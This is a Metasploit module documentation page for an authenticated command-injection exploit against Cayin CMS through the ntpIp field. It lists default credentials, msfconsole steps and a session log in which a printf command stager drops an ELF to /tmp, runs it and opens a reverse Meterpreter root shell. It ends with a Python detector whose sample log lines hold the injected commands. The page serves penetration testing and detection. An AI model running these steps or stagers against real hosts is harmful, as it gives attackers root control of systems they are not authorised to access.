GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/http/cayin_cms_ntp.md

Vulnerable Application

This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed through the ntpIp parameter of the system_service.cgi file. That field is limited in size, so repeated requests are made to deliver a larger payload. Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be fairly fixed and not vary between targets. Exploitation results in root-level access.

In the CMS-SE UI there are several options for the NTP server setting:

  1. Test (runs the injected command 3 times, so it is exploitable, but a different delivery strategy such as wget would be required)

  2. Save (saves the data, but doesn't run it)

  3. Update (what this exploit uses)

The default credentials for the system are administrator:admin, per the vendor guide.

Verification Steps

  1. Install the application on Ubuntu 16.04

  2. Start msfconsole

  3. Do: use exploits/linux/http/cayin_cms_ntp

  4. Do: set rhosts [ip]

  5. Do: run

  6. You should get a root shell.

Options

Scenarios

Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04

```
[*] Processing cayin_cms.rb for ERB directives.
resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
resource (cayin_cms.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cayin_cms.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (cayin_cms.rb)> set lport 6666
lport => 6666
resource (cayin_cms.rb)> set verbose true
verbose => true
resource (cayin_cms.rb)> check
[+] Cayin CMS install detected
[*] 2.2.2.2:80 - The service is running, but could not be validated.
resource (cayin_cms.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:6666
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
[*] Command Stager progress - 26.60% done (199/748 bytes)
[*] Command Stager progress - 53.07% done (397/748 bytes)
[*] Command Stager progress - 79.81% done (597/748 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
[*] Command Stager progress - 100.00% done (748/748 bytes)

meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer     : CMS-SE
OS           : Ubuntu 16.04 (Linux 4.4.0-179-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
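A log-side check for the behaviour this module relies on, added here as an example and not part of the module or of Cayin's product: it scans constructed access-log lines for system_service.cgi requests whose ntpIp value cannot be a plain hostname or IP, and groups repeated chunks from one source that append to the same /tmp file, which is the chunked-stager pattern the size-limited field forces (visible in the session above). The /cgi-bin/ prefix, the act parameter and the combined log format are assumptions; the real request may be a POST whose parameters only a reverse proxy or WAF would log.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined access-log layout; the sample lines below are constructed, not real traffic.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# A legitimate NTP server value is only ever a hostname or dotted IPv4 address.
VALID_NTP = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
# Each stager chunk in the session above appends to one file: ">>/tmp/NAME".
STAGE_FILE = re.compile(r">>\s*(/tmp/\S+)")

# Constructed sample; /cgi-bin/ and "act" are assumptions, ntpIp is from the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2020:10:29:58 -0400] "GET /cgi-bin/system_service.cgi?ntpIp=pool.ntp.org&act=update HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Jun/2020:10:30:10 -0400] "GET /cgi-bin/system_service.cgi?ntpIp=1.1.1.1%3Bprintf%20%27%5C177ELF%27%3E%3E/tmp/TCKAi&act=update HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Jun/2020:10:30:11 -0400] "GET /cgi-bin/system_service.cgi?ntpIp=1.1.1.1%3Bprintf%20%27%5C7%5C0%27%3E%3E/tmp/TCKAi&act=update HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Jun/2020:10:30:12 -0400] "GET /cgi-bin/system_service.cgi?ntpIp=1.1.1.1%3Bchmod%20%2Bx%20/tmp/TCKAi%3B/tmp/TCKAi&act=update HTTP/1.1" 200 312',
    '10.0.0.7 - - [12/Jun/2020:10:31:00 -0400] "GET /index.html HTTP/1.1" 200 1024',
]

def inspect_request(line):
    """Return (src, ntpIp value, staged file or None) for a suspicious system_service.cgi request, else None."""
    m = LOG_RE.match(line)
    url = urlsplit(m.group("target")) if m else None
    if url is None or not url.path.endswith("system_service.cgi"):
        return None
    values = parse_qs(url.query).get("ntpIp")   # parse_qs percent-decodes the value
    if not values or VALID_NTP.match(values[0]):
        return None
    stage = STAGE_FILE.search(values[0])
    return (m.group("src"), values[0], stage.group(1) if stage else None)

def detect_ntpip_injection(lines):
    """Flag every injection attempt, then report sources that sent two or more
    chunks appending to the same /tmp file (a payload split across requests)."""
    findings = []
    chunks = defaultdict(int)  # (src, staged file) -> number of chunks seen
    for line in lines:
        hit = inspect_request(line)
        if hit is None:
            continue
        src, ntp, stage = hit
        findings.append({"src": src, "kind": "ntpIp injection", "value": ntp})
        if stage:
            chunks[(src, stage)] += 1
    for (src, stage), n in chunks.items():
        if n >= 2:
            findings.append({"src": src, "kind": "chunked stager", "file": stage, "requests": n})
    return findings
```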